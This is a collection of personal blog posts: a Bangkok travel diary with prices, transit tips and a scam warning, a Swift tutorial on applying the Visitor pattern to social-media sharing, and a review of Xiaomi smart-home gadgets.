Taking public transportation requires three transfers on the subway and BTS:
Suvarnabhumi -> Phaya Thai
Phaya Thai -> Siam
Siam -> Chong Nonsi
Chong Nonsi (later I found out this is the station for the Mahanakhon Building!)
When getting off the BTS, don’t rush to exit down to street level; you can cross the road via the skywalk.
I felt it was very dark along the way (not many street lights), and it was quite far to walk (15 mins / 1 KM). It can be quite scary to walk alone at night. Along the way, there is a 7-11 and a small night market. I bought some food at 7-11 to take back to the hotel.
In addition, if you take a taxi, due to the two-way road and U-turn issue, the driver needs to drive a short distance past the hotel to the next gap before making a U-turn back to the hotel, so it’s a bit troublesome.
Arrived at the hotel around 10:30.
The room is very spacious, it’s a whole apartment-style room with a master bedroom, a guest bedroom, two bathrooms, a kitchen, a living room, and a balcony.
Taken in 2018 / iPhone 6
It’s a coincidence that during the 2018 company trip to Bangkok, we all took a taxi to the rooftop bar at this hotel in the evening XD
They also offer a Sky Bar dinner package:
2024 / iPhone 15 Pro
Since we were staying here this time, after putting down our luggage in the room, we went up to take a look.
As it was already past dinner time, we could only order some appetizers and skewers.
Had breakfast at the hotel in the morning before heading out. The breakfast was okay, but not many choices.
Due to the large number of people, we took a Grab (THB 135) directly to Wat Pho.
Photo by Florian Wehde
We passed through Chinatown on the way, forgot to take photos, it had a very cyberpunk feel!
👉👉👉 You can also consider KKday’s: Bangkok Private Day Tour: Wat Pho, Wat Arun, Grand Palace, Wat Phra Kaew Thailand
Ticket: THB 300/person.
The colorful stupas in Wat Pho have an indescribable grandeur.
Last time I went to see the reclining Buddha at Nanzoin in Kyushu, Japan, this time I came to see the reclining Buddha in Thailand.
⚠️Be cautious of pickpockets in crowded areas⚠️
You need to wear slippers to enter, and you can walk around the reclining Buddha in Wat Pho to pay your respects.
After leaving Wat Pho, we wanted to exchange some money. Only one friend had exchanged some Thai baht in advance, while the rest of us planned to exchange it in Bangkok. So, we first went to the nearby The Old Siam Shopping Plaza to exchange money at SuperRich.
Exchanged NTD $5,000 for THB $5,200
Khanom bueang Thai crispy pancakes
After exchanging money, we had some cash, so we replenished our energy at the food market on the first floor. We tried Thai crispy pancakes (ขนมเบื้อง), which were sweet with meringue inside, very similar to cotton candy, and also had banana pancakes. Finally, we bought a cup of iced coffee and continued our journey.
Ticket: THB 500/person.
👉👉👉KKday offers: Grand Palace and Wat Phra Kaew Guided Tour (English, Thai, Chinese, Japanese) , for those who want to learn more about history.
Walking back to the Grand Palace (Wat Phra Kaew is inside the Grand Palace), you will see many government buildings along the way.
There is a dress code to enter the Grand Palace, so pay special attention!
No shorts, sleeveless shirts, ripped jeans, capri pants, short skirts, etc.
⚠️Be cautious of pickpockets in crowded areas⚠️
Yaksha guardian at the gate
Yaksha and monkeys
Wat Arun
Ramakien Mural
Image Source: Trueplookpanya
⚠️No Photography Allowed at the Jade Buddha⚠️
The attire varies with each season, and this time we saw the second type of clothing.
Grand Palace
Around 13:00, after leaving the Grand Palace, we had lunch at a nearby western restaurant heading towards the pier.
⚠️Outside the pier, there will be people trying to lure you onto private boats, charging high fees (THB 500, 1000) and not being safe; ignore them and find the official pier and counter to inform them of your destination.
The official fare is only THB 30 (from Tha Chang to Wat Arun), the new boats are air-conditioned, safe, and comfortable.
When the boat arrives, the staff will announce “Wat Arun” (yes, in Chinese), and you can always ask if unsure.
It’s almost time for afternoon thunderstorms, and you can see the water flowing turbulently.
The boat is new, the air conditioning is cool, the enclosed space is safe, and there are frequent trips, making it very convenient!
Upon arrival, the staff will also announce “Wat Arun.”
Entrance Fee: THB 200
After disembarking, you will reach Wat Arun, where you can directly queue to purchase tickets for entry.
⚠️There is a dress code at Wat Arun⚠️
No sleeveless tops, shorts, exposed midriffs, or short skirts allowed.
You can wear Thai traditional clothing; many people wear Thai attire for photos.
You can walk to the central platform for photos (⚠️Be careful, the stairs are steep), and many people also change into Thai attire for photos here.
👉👉👉 Recommended KKday Experiences:
- Thai Costume Experience with Photo Tour at Wat Arun in Bangkok, Thailand
After visiting, return to the pier and find the ticket booth (PIER 2) to buy a boat ticket to ICONSIAM (THB 40), then board at PIER 1.
Also a comfortable and safe new boat!
ICONSIAM is large and luxurious, the food street on the first floor is very distinctive.
Buy a cup of ChaTraMue Thai milk tea to recharge.
Continue walking to BTS Charoen Nakhon platform, thinking of getting a foot massage for an hour.
There is a newer and larger Thai Garden Massage outside the station (1), but no available seats; fortunately, continue walking to (2) another one as shown in the picture, which I find very comfortable, less crowded, spacious, quiet, and inexpensive (foot/1 hour/THB 270).
After the massage, with renewed energy, continue shopping and return to ICONSIAM; walk upstairs to the restaurant, which is also elaborately decorated with a jungle theme, small bridges, flowing water, and a waterfall, overall very nice!
Bought the famous Japanese TORO FRIES (long queue) to recharge.
They also have Japanese % coffee here.
This is a branch line with only three stations and fewer trains.
Google Maps seems to have no information on this BTS line; it suggests walking to Krung Thon Buri.
Take one stop from here to Krung Thon Buri, which is the Silom Line.
There is also LAWSON in Bangkok!
Change to the Sukhumvit Line at Siam and get off at Ari station, a short walk to LHAO LHAO restaurant.
The boss seems to be Chinese? It feels like a fusion of Chinese and Thai cuisine, a highly rated old restaurant, and it seems to be a favorite of Blackpink’s LISA.
Because I’m going to The Rock Pub for a live music session later, I had to eat quickly, but I found every dish delicious!
Recommended by Thai people, the goose brand cooling jelly, I later bought a can, it smells smoother than a mint nasal stick and is less irritating to the nasal cavity!
After dinner, head to The Rock Pub for drinks and live music.
Event of the day:
Rundown:

• 20.00-21.00: A LIKELY LAD
(Kings Of Leon/Blur/Arcade Fire and more)

• 21.15-22.15: COUNTING DUCKS
(Radiohead/The Strokes/The Killers and more)

• 22.30-00.00: THE CHOCOLATE COSMOS
(Arctic Monkeys/Joy Division/The Cure/The Smiths and more)

• 00.15-01.15: LIAM FT. HENSHIN
(Oasis and more)
Price: THB 350 with one drink, advance ticket reservation required.
Learned a cool fact about Thailand: you can’t take photos of alcohol labels because it might be seen as promoting drinking, so you have to cover the label as shown in image 3.
Four performances, all rock and classic songs!
I’ve heard songs from: Coldplay, Radiohead, Kings of Leon, Arcade Fire, Oasis, The Killers…
We left around 23:00 as it was getting late, and the whole performance was very impressive! Whether it was the singing skills or the live performance, I thought it was great! Very talented!
After returning to the hotel to give Chun-Hsiu Liu Taiwan souvenirs, we dispersed and went back to rest.
Early in the morning, we took a Grab to have breakfast at Wang Chunsheng Beef Hot Pot. The overall taste was quite Chinese/Taiwanese style, which I thought was good, but the beef soup in Tainan was even better.
After breakfast, we went to Chatuchak Market. Since it was quite far, we didn’t feel like walking and transferring to the BTS, so we took an Uber directly there (THB 374).
👉👉👉 [KKday Chatuchak Market Bangkok Private Transfer Service](https://www.kkday.com/zh-tw/product/182142?cid=19365)
Chatuchak Market is large with many vendors, but it’s clean and easy to shop around. However, there is a high repetition of items, and it seems like many are selling Made In China products for tourists.
In the end, I only bought a Thai brand, Phutawan indoor diffuser, as a souvenir.
When we got tired from shopping, we went into a massage shop for foot and shoulder/neck massages (1 hour/THB 250).
If you need to use the restroom at Chatuchak Market, there are paid restrooms on the outskirts (THB 5 per use). I went in and found it very clean, with one person per stall, and they were constantly being cleaned. If you prefer not to pay for the restroom, you can also go to the Mixt Chatuchak mall on the outskirts, which has free and equally clean restrooms.
Seafood Rice
Lunch was casually settled at the restaurant in Mixt Chatuchak mall, the taste was good.
After eating, we continued shopping and bought a cup of durian juice to drink, the taste was rich and real, and the price was affordable (THB 89).
Later found that things at Chatuchak were actually cheaper, for example, mint nasal sticks sold here for 6 pieces at $99, while Big C sells 6 pieces for $140… and also durian juice, sold for over $140 at the city night market.
Chatuchak is closer to MRT, but the King Power Mahanakhon Building we want to go to is at BTS Chong Nonsi station; it takes about 1 KM (15 mins) to walk from Chatuchak to the nearest BTS Saphan Khwai station.
Ticket: THB 1,080/person
Upon closer inspection, it is not as tall as imagined, but the architectural style is very unique, with a cyberpunk vibe.
Before entering, there is a security check, and after purchasing the ticket, free luggage storage is provided; backpacks are not allowed to be carried up (small waist bags are allowed).
Before taking the elevator, you can choose whether to take photos (the ticket includes a series of free digital photos, additional charge for physical photos).
Free synthesized digital photos, there will be staff guiding the download after visiting the elevator
The direct elevator has a 360-degree panoramic animation like Taipei 101 and Skytree; the height is about the same as Tokyo Tower.
Upon coming up in the elevator, you will first arrive at the indoor observation deck on the 74th floor, where there is a cafe and public seating for a short rest; to continue, take the elevator or stairs up to the 78th floor, which is the rooftop observation deck.
As soon as you arrive on the 78th floor, there is a small bar where you can order a drink and enjoy the view.
After coming out of the 78th floor, you can continue to climb up to the staircase, the rooftop resting area.
From the rooftop, you can overlook the entire Bangkok, and you can imagine that the night view should be beautiful too!
The staircase and rooftop resting area face the famous transparent glass corridor, where you can directly see the ground vertically. You can enter by taking shoe covers from the nearby box, but bringing a mobile phone is prohibited. You can ask your companions or staff for assistance in taking photos.
The entire glass corridor is not very large, about the size of a rooftop infinity pool in a hotel. It doesn’t feel very high when looking from the side, but you might still feel a bit nervous when actually walking up, feeling a bit weak in the knees. XD
MRT accepts credit card payment.
To get to Central Rama 9, you need to transfer to the MRT underground at Phra Ram 9 Station. Rabbit cards cannot be used; you need to buy tickets or now you can use a VISA card to swipe in and out.
Tested with Taishin GoGo card, not tested with Cathay Cube.
For dinner, come here to find food. I have to say that Bangkok’s night markets and bazaars outshine Taiwan by far. The overall environment is clean, with seating areas, not chaotic, well-planned, and very comfortable to stroll around.
After a stroll, I first had dessert on the left (similar to sponge cake?) and grilled seafood on the right, both with a chewy texture and quite good.
Next up is the highlight, volcano ribs, with a unique taste. The sauce has a lemongrass spicy and sour flavor. Just grab it with your hands and bite directly, very appetizing!
After eating, I bought coconut ice cream + mango + peanut dessert at another stall, also delicious!
After eating, return to Central Rama 9 for a stroll. Here, you can also find the famous NaRaYa Bangkok bags.
On the way back to the hotel, I happened to encounter the post-rain Bangkok with colorful digital advertising screens, the color contrast was maxed out, giving a very cyberpunk vibe.
On the way back to the hotel, I tried Thailand’s convenience store hot pressed toast and Thailand’s banana milk. The filling was melted cheese hot dog, and the crust was crispy! It was delicious and cheap!
Didn’t sleep well all night + hungover all day, feeling lost.
Woke up in the morning and went shopping at Central World.
As soon as I entered the first floor, there was SHAKE SHACK burger. I ordered the SHAKE SHACK signature burger and the coconut milkshake unique to Bangkok. The burger was delicious and not greasy, but I found the milkshake too sweet.
The place was huge, just like ICONSIAM. If you want to explore thoroughly, it’s endless… I bought a shirt on a whim.
After Central World, I went to Big C across the street to buy snacks and souvenirs. (There were many options, but I didn’t find them cheaper…)
Bottom left Phutawan indoor fragrance diffuser was bought at Chatuchak yesterday, but I think department stores in the city also have it.
Also, it seems that Big C no longer provides plastic bags, so you have to buy an eco-friendly bag in the store.
The durian chips come in a big pack, but when you open it, there are only two small packs… but they are quite delicious.
Outside Central World, there was a food market event at the plaza, not just simple stalls, but with a theme. This time it was Titanic-themed, and you could enter for free by following their official Youtube channel; the interior was also beautifully decorated.
Terminal 21 is a place you can never finish exploring. Each floor has a different theme, for example, the Japan section mainly sells Japanese products and restaurants.
The main purpose was to meet up with Chun-Hsiu Liu at the food street upstairs for a meal. ( Highly recommended food spot that is cheap and delicious )
At the food street, you find your own seat, and many locals also come to eat.
⚠️ Regarding payment here, the shops do not accept direct payment. You need to go to the counter first to exchange cash for a food card, then pay with the QR code on the food card; after eating, return to the counter for refund without any deposit or handling fee.
There are many choices, just queue up, state your order number, pay with the food card QR code, and you can also take away (I remember there is an additional THB 10 for packaging).
Ordered seafood stir-fried noodles (THB 50) + pork cutlet with fries (THB 59) = THB 109
After eating, also took away a box of mango sticky rice as a late-night snack back at the hotel.
It’s really delicious and cheap!!! A meal at a restaurant outside would cost at least 200-300, but here it’s mostly THB 50-80 per meal.
After eating, went to Benjakitti Park at the back to walk around and look for the legendary Bangkok giant lizard; maybe because it was night, didn’t see a single one.
⚠️Encountered a scam by foreigners on the way back to the hotel:⚠️
While waiting for the BTS on the platform…
Someone who looked like they were from the Middle East approached
- Asked if you were Thai, if you spoke English, and where you were from
- I said Taiwan
- He immediately responded, Oh… Taiwan, I love Taiwan
But from his pronunciation, I knew he had no idea about Taiwan…
- Then he said he needed to exchange money but SuperRich was closed, and asked me how many Thai baht he could get for a hundred US dollars
I felt something was off, so I just ignored him and walked away…
Their methods are all similar, either asking about your country's currency, showing curiosity, asking to see it, then while you are taking out your wallet, they either pickpocket or snatch your money and run.
Back at the hotel, a friend bought some mangosteen to taste. I found the fresh ones delicious, with a subtle sweetness and the flavor of mangosteen, very palatable. Later, we tried dried mangosteen, and the taste wasn’t as good, just dry and sour.
Regarding durians, durians in Bangkok are not cheaper… They cost around THB 200 - 300 per room.
In the morning, still curious, I specifically went to Lumphini Park to find the legendary Bangkok giant lizard. Due to time constraints, I only found a medium-sized lizard basking in the sun in the morning.
Looking for the giant lizard was just a personal, boring activity for me. Locals reportedly dislike this type of lizard (water monitor lizard), as they eat dirty things. Do not touch them casually.
The flight at 15:20, we had to leave at noon. It takes about an hour from the city to the airport.
👉👉👉 You can refer to KKday airport transfer service:
- [Thailand Airport Private Transfer Suvarnabhumi Airport (BKK) / Don Mueang Airport (DMK) - Bangkok/Pattaya/Hua Hin City Hotels](https://www.kkday.com/zh-tw/product/3431-bkk-or-dmk-bangkok-private-transfer?cid=19365)
- [Bangkok Airport Transfer Private Car from Bangkok City to Suvarnabhumi Airport (BKK)/Don Mueang Airport (DMK)](https://www.kkday.com/zh-tw/product/138989?cid=19365)
Grab fare from the hotel: THB 577, need to take the expressway; the driver will pay the toll first, and the Grab card fare will be adjusted later with the toll fee. (I remember it was around THB 50)
Checked baggage limit is 15 kg, managed to stay within the limit.
Bangkok’s night gatekeeper.
Departed around 13:20, Bangkok airport security is quite strict, everything needs to go through security check, and almost all carry-on bags need to be manually inspected.
Upon exiting and passing through security, there was about an hour left to grab something to eat; found a Thai restaurant and had the last meal in Thailand (seafood fried rice, mango juice, mango sticky rice).
After exiting, many shops sell take-out boxes for mango sticky rice, so you can buy some to eat on the plane if you’re still hungry!
(⚠️But remember not to bring it back to Taiwan⚠️)
This bottle of water deserves a close-up shot because the budget airline didn’t provide anything, so I thought of buying water at the airport to drink on the plane. However, the mineral water after exiting cost THB 70 - 100 per bottle, and this one was THB 100.
BKK is huge… full of Trip.com advertisements. I arrived on time for the return journey and took the shuttle to catch the flight.
Arrived at TPE Taoyuan International Airport, picked up luggage around 20:45, and went directly to take Kuo-Kuang Motor Transport bus 1841 or 1819 back to Taipei, very convenient without needing to transfer.
Safety is the most important thing when traveling. Here are some safety and precautionary tips.
The following are summarized from a video by Bangkok Cat, and I actually encountered the money exchange/scam during this trip.
It will be banned next year, but here are some experiences to share.
Thailand Tourist Police hotline: 1155.
Recalling some itineraries below for reference; detailed records are no longer available.
Digital Technology 2018 Employee Trip
⚠️The following are all photos and records from 2018, for reference only⚠️
⚠️The following are all photos and records from 2018, for reference only⚠️
⚠️The following are all photos and records from 2018, for reference only⚠️
A colleague (2024) also mentioned that Bangkok has many trendy cafes, which are quite extravagant. If interested, you can check them out. This cafe had low ratings and has closed down.
Source: SHERATON HUA HIN RESORT & SPA
Only took a few photos of the hotel, one of which was a surprising photo of a millipede found in the bed upon waking up in the morning.
Seems to be a small amusement park and shopping mall with Greek-style scenery.
A quite famous attraction, still in operation in 2024.
There are many paintings and artworks.
Hotel is in villa style, each one is standalone, the swimming pool can surround every room in the hotel, there is a bar next to the pool; the outside beach is undeveloped, a desolate area.
After dinner, go to the nearby night market.
It was too early, everyone gave up and didn’t go.
👉👉👉 These two attractions are not easily accessible by public transportation, you can refer to the KKday itinerary:
- [Bangkok Classic Day Tour Maeklong Railway and Damnoen Saduak Floating Market | Depart from Bangkok](https://www.kkday.com/zh-tw/product/9912-maeklong-railway-damnoen-saduak-floating-market-day-tour-from-bangkok?cid=19365)
- [[Thailand] Bangkok Half-Day Private Car Tour Maeklong Railway Market - Amphawa Floating Market - Amphawa Firefly Night Cruise](https://www.kkday.com/zh-tw/product/21751-maeklong-railway-market-and-amphawa-floating-market-with-firefly-night-cruise-bangkok-thailand?cid=19365)
It was quite exciting and adventurous, even though the water was murky and had a smell.
The guide specifically told the shop not to step on our backs; I only remember that it was very high-end, but it hurt so much I couldn’t fall asleep during the massage XD
Because I have to go to the Chao Phraya Princess River Cruise for a buffet dinner tonight, I first went shopping at the department store near the pier.
👉👉👉 Advance reservation is required, you can refer to KKday’s Chao Phraya Princess River Cruise with Dinner Buffet Thailand.
The food was decent, but the night view was beautiful, you could see the lights of the Bangkok Riverside Night Market Ferris Wheel.
After returning to the hotel, I went to the bar upstairs at the Marriott for a drink, I only remember the beautiful night view and cheap drinks.
I remember going to the department store, Big C, and Central World.
This is the hotel I stayed at this time XD
This is the memory of the 2018 employee trip. This time I revisited Bangkok on a fully independent trip, which made me more familiar with this city. Compared to my previous impression, I feel that it is more prosperous, the food is better, and the prices are higher.
— — —
Feel free to contact me for any questions or feedback.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Analysis of the practical application scenarios of the Visitor Pattern (sharing items like products, songs, articles… to Facebook, Line, Linkedin, etc.)
Photo by Daniel McCullough
From first learning that "Design Patterns" exist until now, more than 10 years have passed, and I still can't confidently say I have mastered them. I have always been somewhat confused: I have gone through all the patterns from start to finish several times, but if I don't internalize them and apply them in practice, I quickly forget them.
I am truly useless.
I once saw a very good analogy: techniques, such as PHP, Laravel, iOS, Swift, SwiftUI, and so on, are relatively easy to switch between and learn, while algorithms, data structures, design patterns, and the like are internal strength. The two complement each other: techniques are easy to learn, but internal strength is hard to cultivate. Someone with excellent techniques may not have excellent internal strength, while someone with excellent internal strength can pick up techniques quickly. So rather than saying they simply complement each other, it is better to say that internal strength is the foundation, and techniques build on it to achieve great results.
Based on my previous learning experiences, I believe that the learning method of Design Patterns that suits me best is to focus on mastering a few patterns first, internalize and flexibly apply them, develop a sense of judgment to determine which scenarios are suitable and which are not, and then gradually accumulate new patterns until mastering all of them. I think the best way is to find practical scenarios to learn from applications.
I recommend two free learning resources:
The first chapter documents the Visitor Pattern, which is one of the gold mines I dug up during my year at StreetVoice, where Visitor was widely used to solve architectural problems in the StreetVoice App. I also grasped the essence of Visitor during this experience, so let’s start with it in the first chapter!
First, make sure you understand what the Visitor pattern is, what problems it solves, and how it is structured.
The image is from refactoringguru.
The detailed content is not repeated here. Please refer directly to refactoringguru’s explanation of Visitor first.
Assuming today we have the following models: UserModel, SongModel, PlaylistModel. Now we need to implement a sharing feature that can share to: Facebook, Line, Instagram, these three platforms. The sharing message to be displayed for each model is different, and each platform requires different data:
The combination scenario is as shown in the above image. The first table shows the customized content of each model, and the second table shows the data required by each sharing platform.
Especially when sharing a Playlist on Instagram, multiple images are required, which is different from the source required for other sharing platforms.
First, define the properties of each model:
// Model
struct UserModel {
    let id: String
    let name: String
    let profileImageURLString: String
}

struct SongModel {
    let id: String
    let name: String
    let user: UserModel
    let coverImageURLString: String
}

struct PlaylistModel {
    let id: String
    let name: String
    let user: UserModel
    let songs: [SongModel]
    let coverImageURLString: String
}

// Data

let user = UserModel(id: "1", name: "Avicii", profileImageURLString: "https://zhgchg.li/profile/1.png")

let song = SongModel(id: "1",
                     name: "Wake me up",
                     user: user,
                     coverImageURLString: "https://zhgchg.li/cover/1.png")

let playlist = PlaylistModel(id: "1",
                             name: "Avicii Tribute Concert",
                             user: user,
                             songs: [
                                song,
                                SongModel(id: "2", name: "Waiting for love", user: UserModel(id: "1", name: "Avicii", profileImageURLString: "https://zhgchg.li/profile/1.png"), coverImageURLString: "https://zhgchg.li/cover/3.png"),
                                SongModel(id: "3", name: "Lonely Together", user: UserModel(id: "1", name: "Avicii", profileImageURLString: "https://zhgchg.li/profile/1.png"), coverImageURLString: "https://zhgchg.li/cover/1.png"),
                                SongModel(id: "4", name: "Heaven", user: UserModel(id: "1", name: "Avicii", profileImageURLString: "https://zhgchg.li/profile/1.png"), coverImageURLString: "https://zhgchg.li/cover/4.png"),
                                SongModel(id: "5", name: "S.O.S", user: UserModel(id: "1", name: "Avicii", profileImageURLString: "https://zhgchg.li/profile/1.png"), coverImageURLString: "https://zhgchg.li/cover/5.png")],
                             coverImageURLString: "https://zhgchg.li/playlist/1.png")
We extracted a CanShare protocol; any model that conforms to it supports sharing. The sharing side is likewise abstracted into a ShareManagerProtocol, so adding a new sharing destination only means implementing that protocol and does not affect the other ShareManagers.
However, getShareImageURLStrings still feels strange. And if a newly added sharing platform needs data from the models that is vastly different, say WeChat sharing requiring play counts, creation dates, and so on that only it needs, things will start to get messy.
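Since the code of that earlier version is not shown here, here is a minimal sketch of roughly what it could look like, using the CanShare / ShareManagerProtocol / getShareImageURLStrings names mentioned above (the signatures are my assumption, not the original):

// Hypothetical sketch of the pre-Visitor version described above (names and signatures assumed).
protocol CanShare {
    func getShareTitle() -> String
    func getShareURLString() -> String
    // Awkward spot: only the Instagram + Playlist combination needs multiple images,
    // yet every model has to answer this question.
    func getShareImageURLStrings() -> [String]
}

extension SongModel: CanShare {
    func getShareTitle() -> String { return "\(user.name) - \(name)" }
    func getShareURLString() -> String { return "https://zhgchg.li/user/\(user.id)/song/\(id)" }
    func getShareImageURLStrings() -> [String] { return [coverImageURLString] }
}

protocol ShareManagerProtocol {
    func share(_ model: CanShare)
}

class FacebookShareManager: ShareManagerProtocol {
    func share(_ model: CanShare) {
        // call Facebook share sdk with model.getShareURLString()...
        print("Share to Facebook: \(model.getShareURLString())")
    }
}

Every new data requirement leaks into CanShare, which is exactly what the Visitor version below avoids.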
Solution using the Visitor Pattern.
// Visitor Version
protocol Shareable {
    func accept(visitor: SharePolicy)
}

extension UserModel: Shareable {
    func accept(visitor: SharePolicy) {
        visitor.visit(model: self)
    }
}

extension SongModel: Shareable {
    func accept(visitor: SharePolicy) {
        visitor.visit(model: self)
    }
}

extension PlaylistModel: Shareable {
    func accept(visitor: SharePolicy) {
        visitor.visit(model: self)
    }
}

protocol SharePolicy {
    func visit(model: UserModel)
    func visit(model: SongModel)
    func visit(model: PlaylistModel)
}

class ShareToFacebookVisitor: SharePolicy {
    func visit(model: UserModel) {
        // call Facebook share sdk...
        print("Share to Facebook...")
        print("[](https://zhgchg.li/user/\(model.id))")
    }

    func visit(model: SongModel) {
        // call Facebook share sdk...
        print("Share to Facebook...")
        print("[](https://zhgchg.li/user/\(model.user.id)/song/\(model.id))")
    }

    func visit(model: PlaylistModel) {
        // call Facebook share sdk...
        print("Share to Facebook...")
        print("[](https://zhgchg.li/user/\(model.user.id)/playlist/\(model.id))")
    }
}

class ShareToLineVisitor: SharePolicy {
    func visit(model: UserModel) {
        // call Line share sdk...
        print("Share to Line...")
        print("[Hi sharing a great artist \(model.name).](https://zhgchg.li/user/\(model.id))")
    }

    func visit(model: SongModel) {
        // call Line share sdk...
        print("Share to Line...")
        print("[Hi sharing a great song just heard, \(model.user.name)'s \(model.name), played by him.](https://zhgchg.li/user/\(model.user.id)/song/\(model.id))")
    }

    func visit(model: PlaylistModel) {
        // call Line share sdk...
        print("Share to Line...")
        print("[Hi can't stop listening to this playlist \(model.name).](https://zhgchg.li/user/\(model.user.id)/playlist/\(model.id))")
    }
}

class ShareToInstagramVisitor: SharePolicy {
    func visit(model: UserModel) {
        // call Instagram share sdk...
        print("Share to Instagram...")
        print(model.profileImageURLString)
    }

    func visit(model: SongModel) {
        // call Instagram share sdk...
        print("Share to Instagram...")
        print(model.coverImageURLString)
    }

    func visit(model: PlaylistModel) {
        // call Instagram share sdk...
        print("Share to Instagram...")
        print(model.songs.map({ $0.coverImageURLString }).joined(separator: ","))
    }
}

// Use case
let shareToInstagramVisitor = ShareToInstagramVisitor()
user.accept(visitor: shareToInstagramVisitor)
playlist.accept(visitor: shareToInstagramVisitor)
Let’s see what we did:
- Each model conforms to Shareable and implements func accept(visitor: SharePolicy), so if we add a new model that supports sharing, it only needs to implement the protocol.
- The visitor declares a separate visit(model:) for each concrete model rather than a single visit(model: Shareable); if we did that, we would repeat the issues from the previous version.
- Each sharing destination lives in its own SharePolicy visitor, achieving the goal of low coupling and high cohesion in software development.
The above is the classic Visitor double-dispatch implementation. However, we rarely encounter this full situation in daily development; usually we may only have one visitor, but I think the pattern is still suitable to compose with. For example, if we have a SaveToCoreData requirement today, we can directly define accept(visitor: SaveToCoreDataVisitor) without declaring a Policy protocol, which is also a good architectural approach.
protocol Saveable {
    func accept(visitor: SaveToCoreDataVisitor)
}

class SaveToCoreDataVisitor {
    func visit(model: UserModel) {
        // map UserModel to coredata
    }

    func visit(model: SongModel) {
        // map SongModel to coredata
    }

    func visit(model: PlaylistModel) {
        // map PlaylistModel to coredata
    }
}
Other applications: Save, Like, tableView/collectionView cellForRowAt… (a minimal sketch of the cellForRowAt case follows below).
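As an illustration of the cellForRowAt case, here is a minimal sketch (the cell reuse identifiers and UIKit wiring are assumptions for illustration, not from the original project):

import UIKit

// Hypothetical sketch: one visitor decides how to dequeue/configure a cell for each model type.
protocol CellConfigurable {
    func accept(visitor: CellConfiguratorVisitor, indexPath: IndexPath) -> UITableViewCell
}

extension UserModel: CellConfigurable {
    func accept(visitor: CellConfiguratorVisitor, indexPath: IndexPath) -> UITableViewCell {
        return visitor.visit(model: self, indexPath: indexPath)
    }
}

extension SongModel: CellConfigurable {
    func accept(visitor: CellConfiguratorVisitor, indexPath: IndexPath) -> UITableViewCell {
        return visitor.visit(model: self, indexPath: indexPath)
    }
}

class CellConfiguratorVisitor {
    private let tableView: UITableView

    init(tableView: UITableView) {
        self.tableView = tableView
    }

    func visit(model: UserModel, indexPath: IndexPath) -> UITableViewCell {
        // "UserCell" is an assumed reuse identifier
        let cell = tableView.dequeueReusableCell(withIdentifier: "UserCell", for: indexPath)
        cell.textLabel?.text = model.name
        return cell
    }

    func visit(model: SongModel, indexPath: IndexPath) -> UITableViewCell {
        // "SongCell" is an assumed reuse identifier
        let cell = tableView.dequeueReusableCell(withIdentifier: "SongCell", for: indexPath)
        cell.textLabel?.text = "\(model.user.name) - \(model.name)"
        return cell
    }
}

// In tableView(_:cellForRowAt:), with items: [CellConfigurable]:
// return items[indexPath.row].accept(visitor: cellConfigurator, indexPath: indexPath)

The table view no longer needs a chain of if/else type checks; each model decides which visit overload to dispatch to.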
Finally, let’s talk about some common principles:
inspired by @saiday
Feel free to contact me for any questions or feedback.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
AI Speaker, Temperature and Humidity Sensor, Scale 2, DC Inverter Fan Usage Experience
Following the previous post, "Smart Home First Experience — Apple HomeKit & Xiaomi Mi Home," on how to use Xiaomi smart home products, I went on to buy a few more Xiaomi home products and tried to make every appliance at home smart… I can only say it's a deep rabbit hole. Initially I just wanted to buy a desk lamp because Xiaomi's design is beautiful, then I researched its smart features and fell right in!
Price: NT$ 1,495
In summary, for daily use it's just a Bluetooth speaker that can play music; occasionally I ask the Xiao Ai Speaker to remind me of the time… and that's it, which Siri can actually do too. Not being able to use it as a Bluetooth speaker for the computer is the really painful part for me, but I have to say its voice features are genuinely smart and impressive! It's worth buying for fun.
Small item, NT$ 365
You need to buy an AAA battery separately to install it; the official claim is that the battery can last up to one year. The round, compact design with a magnetic mount makes it easy to take down and check anytime, and the dual display lets you see the current temperature and humidity at a glance.
APP Temperature Record
It only supports a Bluetooth connection, so if your phone is out of Bluetooth range it cannot read the data, unless you buy a Bluetooth gateway or another Mi Home device that supports the Bluetooth gateway function.
List of devices supporting Bluetooth gateway from official documents
Generally, devices that support both WiFi and Bluetooth are supported, but Xiaomi AI Speaker does not!!
And I discovered something amazing: the Mi Home DC Inverter Fan actually supports it, WTF!!! So currently I use the Mi Home fan to relay the temperature and humidity sensor data to the internet over WiFi.
It’s really weird… Xiaomi AI Speaker, desk lamp, table lamp, camera do not support the Bluetooth gateway function, but the fan does!
*Not sure if it’s only the temperature and humidity sensor that can do this
Push notifications are sent when the temperature is too high or the humidity is too high (but those temperature and humidity levels are completely normal in Taiwan…).
How to turn off:
Go to “My” -> Top right corner “Settings” -> Device notifications -> Find Mijia Bluetooth Temperature and Humidity Meter -> Turn off
After turning it off, you will no longer receive push notifications!
It’s just a scale, NT$ 395
In addition to recording weight on the app, it also has functions like weighing objects and balance tests… but it’s mainly used for weighing; it has a beautiful appearance and can enhance the quality of your home even when not in use!
The scale requires a separate Xiaomi Health app. Open the app while weighing to sync the weight records.
Xiaomi Health App
The most satisfying appliance in this purchase, NT$ 1995
The left and right swing angle is 120 degrees, which is quite large. The wind power adjustment supports 1–100 levels, allowing you to adjust the wind power as you like. My favorite is the “natural wind” mode because I like direct blowing but often feel uncomfortable after a while. This natural wind mode allows me to keep the direct blowing mode without discomfort!
It maintains Xiaomi’s simple white design. Personally, I don’t like fans that are too metallic (they feel dirty). Xiaomi fans are very light and clean, and they look comfortable even when not in use.
After adding it to the Mijia app, you can control all parameters (mode, switch, wind power, angle) from the app. You can also set periodic timing (e.g., turn off at 7:00 AM from Monday to Friday) and link with Mijia devices (e.g., automatically turn on when you get home, automatically turn on when the temperature exceeds 30 degrees) to play with smart home functions.
Additionally, I found that it can act as a Bluetooth gateway to help the Mijia Bluetooth Temperature and Humidity Meter transmit data.
*Not sure if only the temperature and humidity meter can do this
The above is a summary of the new purchases. There is still a long way to go to reach the ideal setup (automatically turning on the air conditioner when the temperature is too high, having the fan follow people, turning on the lights when coming home, turning off the lights and turning on the camera when leaving home, turning on the dehumidifier when the humidity is too high). Some of it is quite hardcore… you need to know how to modify circuits, my dehumidifier turns out to have no auto-resume function, and the air conditioner is an old model. Many Mijia devices are not sold in Taiwan (e.g., the universal remote control). I originally wanted to build a full smart home, but after thinking it over it is not that practical, so for now I am still researching what else can be made smart!
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Build your own ChatGPT OpenAI API for Slack App (Google Cloud Functions & Python)
